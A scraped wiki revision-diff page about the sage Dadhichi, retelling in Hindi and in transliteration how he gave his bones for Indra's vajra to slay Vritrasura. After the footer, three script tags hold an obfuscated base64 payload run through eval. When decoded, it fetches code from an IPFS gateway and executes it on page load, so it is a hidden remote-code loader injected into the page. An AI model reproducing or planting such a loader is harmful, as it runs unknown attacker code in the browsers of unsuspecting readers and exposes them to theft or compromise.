Difference between revisions of "दधीचि"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 4: Line 4:
 
==कथा==
 
==कथा==
 
कहा जाता है कि एक बार इन्द्रलोक पर 'वृत्रासुर' नामक [[राक्षस]] ने अधिकार कर लिया तथा [[इन्द्र]] सहित देवताओं को देवलोक से निकाल दिया। सभी [[देवता]] अपनी व्यथा लेकर [[ब्रह्मा]], [[विष्णु]] व [[महेश]] के पास गए, लेकिन कोई भी उनकी समस्या का निदान न कर सका। बाद में ब्रह्मा जी ने देवताओं को एक उपाय बताया कि [[पृथ्वी]] लोक मे 'दधीचि' नाम के एक महर्षि रहते हैं। यदि वे अपनी अस्थियों का दान कर दें तो उन अस्थियों से एक वज्र बनाया जाये। उस वज्र से वृत्रासुर मारा जा सकता है, क्योंकि वृत्रासुर को किसी भी अस्त्र-शस्त्र से नहीं मारा जा सकता। महर्षि दधीचि की अस्थियों में ही वह ब्रह्म तेज़ है, जिससे वृत्रासुर राक्षस मारा जा सकता है। इसके अतिरिक्त और कोई दूसरा उपाय नहीं है।
 
कहा जाता है कि एक बार इन्द्रलोक पर 'वृत्रासुर' नामक [[राक्षस]] ने अधिकार कर लिया तथा [[इन्द्र]] सहित देवताओं को देवलोक से निकाल दिया। सभी [[देवता]] अपनी व्यथा लेकर [[ब्रह्मा]], [[विष्णु]] व [[महेश]] के पास गए, लेकिन कोई भी उनकी समस्या का निदान न कर सका। बाद में ब्रह्मा जी ने देवताओं को एक उपाय बताया कि [[पृथ्वी]] लोक मे 'दधीचि' नाम के एक महर्षि रहते हैं। यदि वे अपनी अस्थियों का दान कर दें तो उन अस्थियों से एक वज्र बनाया जाये। उस वज्र से वृत्रासुर मारा जा सकता है, क्योंकि वृत्रासुर को किसी भी अस्त्र-शस्त्र से नहीं मारा जा सकता। महर्षि दधीचि की अस्थियों में ही वह ब्रह्म तेज़ है, जिससे वृत्रासुर राक्षस मारा जा सकता है। इसके अतिरिक्त और कोई दूसरा उपाय नहीं है।
 
+
====इन्द्र का संकोच====
देवराज इन्द्र महर्षि दधीचि के पास जाना नही चाहते थे क्योकि कहा जाता है कि इन्द्र ने एक बार दधीचि का अपमान किया था अपमान किया था जिसके कारण वे दधीचि के पास जाने से कतरा रहे थे। कहा जाता है कि ब्रहम्म विद्या का ज्ञान पूरे विश्व मे केवल दधीचि को ही था। वे पात्र व्यक्ति को ही इसका ज्ञान देना चाहते थे लेकिन इन्द्र ब्रहम्म विद्या प्राप्त करना चाहते थे दधीचि की दृष्टि मे इन्द्र इस विद्या के पात्र नही थे इसलिए उन्होने पूर्व मे इन्द्र को इस विद्या को देने से मना कर दिया था। इन्द्र ने उन्हे किसी अन्य को भी यह विद्या देने को कहा तथा कहा कि यदि आपने ऐसा किया तो मै आपका सिर धड से अलग कर दूंगा। महर्षि ने कहा कि यदि कोई पात्र मिला तो मै उसे अवश्य यह विद्या दूंगा। कुछ समय बाद इन्द्र लोक से ही अश्विनी कुमार महर्षि दधीचि के पास यह विद्या लेने पहुंचे महर्षि को वे इसके पात्र लगे उन्होने अश्विनी कुमारो को इन्द्र द्वारा कही गई बाते बताई तब अश्विनी कुमारो ने महर्षि दधीचि के अश्व का सिर लगाकर यह विद्या प्राप्त कर ली इन्द्र को जब यह जानकारी मिली तो वह पृथ्वी लोक मे आया और अपनी घोषणा अनुसार महर्षि दधीचि का सिर धड से अलग कर दिया। अश्विनी कुमारो ने महर्षि के असली सिर को वापस लगा दिया। इस कारण इन्द्र ने अश्विनी कुमारो को इन्द्र लोक से निकाल दिया । यही कारण था कि अब वे किस मुंह से महर्षि दधीचि के पास उनकी अस्थियों का दान लेने जाते।
+
देवराज इन्द्र महर्षि दधीचि के पास जाना नहीं चाहते थे, क्योंकि इन्द्र ने एक बार दधीचि का अपमान किया था, जिसके कारण वे दधीचि के पास जाने से कतरा रहे थे। माना जाता है कि ब्रह्म विद्या का ज्ञान पूरे विश्व मे केवल महर्षि दधीचि को ही था। महर्षि मात्र विशिष्ट व्यक्ति को ही इस विद्या का ज्ञान देना चाहते थे, लेकिन इन्द्र ब्रह्म विद्या प्राप्त करने के परम इच्छुक थे। दधीचि की दृष्टि में इन्द्र इस विद्या के पात्र नहीं थे। इसलिए उन्होंने इन्द्र को इस विद्या को देने से मना कर दिया। दधीचि के इंकार करने पर इन्द्र ने उन्हें किसी अन्य को भी यह विद्या देने को मना कर दिया और कहा कि- "यदि आपने ऐसा किया तो मैं आपका सिर धड़ से अलग कर दूँगा"। महर्षि ने कहा कि- "यदि उन्हें कोई योग्य व्यक्ति मिलेगा तो वे अवश्य ही ब्रह्म विद्या उसे प्रदान करेंगे।" कुछ समय बाद इन्द्रलोक से ही [[अश्विनीकुमार]] महर्षि दधीचि के पास ब्रह्म विद्या लेने पहुँचे। दधीचि को अश्विनीकुमार ब्रह्म विद्या पाने के योग्य लगे। उन्होंने अश्विनीकुमारों को [[इन्द्र]] द्वारा कही गई बातें बताईं। तब अश्विनीकुमारों ने महर्षि दधीचि के अश्व का सिर लगाकर ब्रह्म विद्या प्राप्त कर ली। इन्द्र को जब यह जानकारी मिली तो वह पृथ्वी लोक में आये और अपनी घोषणा के अनुसार महर्षि दधीचि का सिर धड़ से अलग कर दिया। अश्विनीकुमारों ने महर्षि के असली सिर को फिर से लगा दिया। इन्द्र ने अश्विनीकुमारों को इन्द्रलोक से निकाल दिया। यही कारण था कि अब इन्द्र महर्षि दधीचि के पास उनकी अस्थियों का दान माँगने के लिए आना नहीं चाहते थे। वे इस कार्य के लिए बड़ा ही संकोच महसूस कर रहे थे।
  
 
लेकिन उधर देवलोक पर वृत्रासुर राक्षस के अत्याचार बढते ही जा रहे थे वह देवताओ को भांति भांति से परेशान कर रहा था। अन्ततः इन्द्र को इन्द्र लोक की रक्षा व देवताओ की भलाई के लिए और अपने सिंहासन को बचाने के लिए देवताओ सहित महर्षि दधीचि की शरण मे जाना ही पडा। महर्षि दधीचि ने इन्द्र को पूरा सम्मान दिया तथा आने आश्रम आने का कारण पूछा देवताओ सहित इन्द्र ने महर्षि को अपनी व्यथा सुनाई तो दधीचि ने कहा कि मै देवलोक की रक्षा के लिए क्या कर सकता हू देवताओ ने उन्हे ब्रहमा विष्णु व महेश की कही बाते बताई तथा उनकी अस्थियो का दान मांगा। महर्षि दधीचि ने बिना किसी हिचकिचाहट के अपनी अस्थियो का दान देना स्वीकार कर लिया उन्होने समाधी लगाई और अपनी देह त्याग दी। उस समय उनकी पत्नी आश्रम मे नही थी अब समस्या ये आई कि महर्षि दधीचि के शरीर के मांस को कौन उतारे सभी देवता सहम गए। तब इन्द्र ने कामधेनु गाय को बुलाया और उसे महर्षि के शरीर से मांस उतारने हेतु कहा। कामधेनु गाय ने अपनी जीभ से चाटकर महर्षि के शरीर का मांस उतार दिया। जब केवल अस्थियों का पिंजर रह गया तो इन्द्र ने दधीचि की अस्थियों का वज्र बनाया तथा उससे वृत्रासुर राक्षस का वध कर पुनः इन्द्र लोक पर अपना राज्य स्थापित किया!
 
लेकिन उधर देवलोक पर वृत्रासुर राक्षस के अत्याचार बढते ही जा रहे थे वह देवताओ को भांति भांति से परेशान कर रहा था। अन्ततः इन्द्र को इन्द्र लोक की रक्षा व देवताओ की भलाई के लिए और अपने सिंहासन को बचाने के लिए देवताओ सहित महर्षि दधीचि की शरण मे जाना ही पडा। महर्षि दधीचि ने इन्द्र को पूरा सम्मान दिया तथा आने आश्रम आने का कारण पूछा देवताओ सहित इन्द्र ने महर्षि को अपनी व्यथा सुनाई तो दधीचि ने कहा कि मै देवलोक की रक्षा के लिए क्या कर सकता हू देवताओ ने उन्हे ब्रहमा विष्णु व महेश की कही बाते बताई तथा उनकी अस्थियो का दान मांगा। महर्षि दधीचि ने बिना किसी हिचकिचाहट के अपनी अस्थियो का दान देना स्वीकार कर लिया उन्होने समाधी लगाई और अपनी देह त्याग दी। उस समय उनकी पत्नी आश्रम मे नही थी अब समस्या ये आई कि महर्षि दधीचि के शरीर के मांस को कौन उतारे सभी देवता सहम गए। तब इन्द्र ने कामधेनु गाय को बुलाया और उसे महर्षि के शरीर से मांस उतारने हेतु कहा। कामधेनु गाय ने अपनी जीभ से चाटकर महर्षि के शरीर का मांस उतार दिया। जब केवल अस्थियों का पिंजर रह गया तो इन्द्र ने दधीचि की अस्थियों का वज्र बनाया तथा उससे वृत्रासुर राक्षस का वध कर पुनः इन्द्र लोक पर अपना राज्य स्थापित किया!

Revision as of 06:58, 29 July 2013

dadhichi prachin kal ke param tapasvi aur khyatiprapt maharshi the. unaki patni ka nam 'gabhastini' tha. maharshi dadhichi ved shastroan adi ke poorn jnata aur svabhav ke b de hi dayalu the. ahankar to unhean chhoo tak nahian paya tha. ve sada doosaroan ka hit karana apana param dharm samajhate the. unake vyavahar se us van ke pashu-pakshi tak santusht the, jahaan ve rahate the. ganga ke tat par hi unaka ashram tha. jo bhi atithi maharshi dadhichi ke ashram par ata, svayan maharshi tatha unaki patni atithi ki poorn shraddha bhav se seva karate the. yooan to 'bharatiy itihas' mean kee dani hue haian, kiantu manav kalyan ke lie apani asthiyoan ka dan karane vale matr maharshi dadhichi hi the. devataoan ke mukh se yah janakar ki matr dadhichi ki asthiyoan se nirmit vajr dvara hi asuroan ka sanhar kiya ja sakata hai, maharshi dadhichi ne apana sharir tyag kar asthiyoan ka dan kar diya.

parichay

lok kalyan ke liye atm-tyag karane valoan mean maharshi dadhichi ka nam b de hi adar ke sath liya jata hai. inaki mata ka nam 'shanti' tatha pita ka nam 'atharva' tha. maharshi dadhichi tapasya aur pavitrata ki pratimoorti the. bhagavan shiv ke prati atoot bhakti aur vairagy mean inaki janm se hi nishtha thi.

katha

kaha jata hai ki ek bar indralok par 'vritrasur' namak rakshas ne adhikar kar liya tatha indr sahit devataoan ko devalok se nikal diya. sabhi devata apani vyatha lekar brahma, vishnu v mahesh ke pas ge, lekin koee bhi unaki samasya ka nidan n kar saka. bad mean brahma ji ne devataoan ko ek upay bataya ki prithvi lok me 'dadhichi' nam ke ek maharshi rahate haian. yadi ve apani asthiyoan ka dan kar dean to un asthiyoan se ek vajr banaya jaye. us vajr se vritrasur mara ja sakata hai, kyoanki vritrasur ko kisi bhi astr-shastr se nahian mara ja sakata. maharshi dadhichi ki asthiyoan mean hi vah brahm tez hai, jisase vritrasur rakshas mara ja sakata hai. isake atirikt aur koee doosara upay nahian hai.

indr ka sankoch

devaraj indr maharshi dadhichi ke pas jana nahian chahate the, kyoanki indr ne ek bar dadhichi ka apaman kiya tha, jisake karan ve dadhichi ke pas jane se katara rahe the. mana jata hai ki brahm vidya ka jnan poore vishv me keval maharshi dadhichi ko hi tha. maharshi matr vishisht vyakti ko hi is vidya ka jnan dena chahate the, lekin indr brahm vidya prapt karane ke param ichchhuk the. dadhichi ki drishti mean indr is vidya ke patr nahian the. isalie unhoanne indr ko is vidya ko dene se mana kar diya. dadhichi ke iankar karane par indr ne unhean kisi any ko bhi yah vidya dene ko mana kar diya aur kaha ki- "yadi apane aisa kiya to maian apaka sir dh d se alag kar dooanga". maharshi ne kaha ki- "yadi unhean koee yogy vyakti milega to ve avashy hi brahm vidya use pradan kareange." kuchh samay bad indralok se hi ashvinikumar maharshi dadhichi ke pas brahm vidya lene pahuanche. dadhichi ko ashvinikumar brahm vidya pane ke yogy lage. unhoanne ashvinikumaroan ko indr dvara kahi gee batean bataeean. tab ashvinikumaroan ne maharshi dadhichi ke ashv ka sir lagakar brahm vidya prapt kar li. indr ko jab yah janakari mili to vah prithvi lok mean aye aur apani ghoshana ke anusar maharshi dadhichi ka sir dh d se alag kar diya. ashvinikumaroan ne maharshi ke asali sir ko phir se laga diya. indr ne ashvinikumaroan ko indralok se nikal diya. yahi karan tha ki ab indr maharshi dadhichi ke pas unaki asthiyoan ka dan maangane ke lie ana nahian chahate the. ve is kary ke lie b da hi sankoch mahasoos kar rahe the.

lekin udhar devalok par vritrasur rakshas ke atyachar badhate hi ja rahe the vah devatao ko bhaanti bhaanti se pareshan kar raha tha. antatah indr ko indr lok ki raksha v devatao ki bhalaee ke lie aur apane sianhasan ko bachane ke lie devatao sahit maharshi dadhichi ki sharan me jana hi pada. maharshi dadhichi ne indr ko poora samman diya tatha ane ashram ane ka karan poochha devatao sahit indr ne maharshi ko apani vyatha sunaee to dadhichi ne kaha ki mai devalok ki raksha ke lie kya kar sakata hoo devatao ne unhe brahama vishnu v mahesh ki kahi bate bataee tatha unaki asthiyo ka dan maanga. maharshi dadhichi ne bina kisi hichakichahat ke apani asthiyo ka dan dena svikar kar liya unhone samadhi lagaee aur apani deh tyag di. us samay unaki patni ashram me nahi thi ab samasya ye aee ki maharshi dadhichi ke sharir ke maans ko kaun utare sabhi devata saham ge. tab indr ne kamadhenu gay ko bulaya aur use maharshi ke sharir se maans utarane hetu kaha. kamadhenu gay ne apani jibh se chatakar maharshi ke sharir ka maans utar diya. jab keval asthiyoan ka pianjar rah gaya to indr ne dadhichi ki asthiyoan ka vajr banaya tatha usase vritrasur rakshas ka vadh kar punah indr lok par apana rajy sthapit kiya!

maharshi dadhichi ne to apani deh devatao ki bhalaee ke lie tyag di lekin jab unaki patni vapas ashram me aee to apane pati ki deh ko dekhakar vilap karane lagi tatha sati hone ki jid karane lagi kaha jata hai ki devatao ne unhe bahut mana kiya kyoki vah garbhavati thi devatao ne unhe apane vansh ke lie sati n hone ki salah di lekin ve nahi mani to sabhi ne unhe apane garbh ko devatao ko saupane ka nivedan kiya is par ve raji ho gee aur apana garbh devatao ko saupakar svayan sati ho gee . devatao ne dadhichi ke vansh ko bachane ke lie use pipal ko usaka lalan palan karane ka dayitv saupa. kuchh samay bad vah garbh palakar shishu hua to pipal dvara palan poshan karane ke karan usaka nam pippalad rakha gaya. isi karan dadhichi ke vanshaj dadhich kahalate hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>